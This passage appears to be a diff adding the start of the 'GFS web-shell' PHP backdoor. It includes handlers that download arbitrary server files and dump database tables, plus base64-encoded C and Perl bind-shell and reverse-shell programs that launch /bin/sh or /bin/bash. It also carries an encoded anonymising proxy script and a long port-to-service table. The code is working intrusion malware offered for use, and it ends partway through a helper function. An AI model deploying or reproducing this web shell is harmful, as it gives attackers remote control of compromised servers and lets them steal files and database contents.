+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
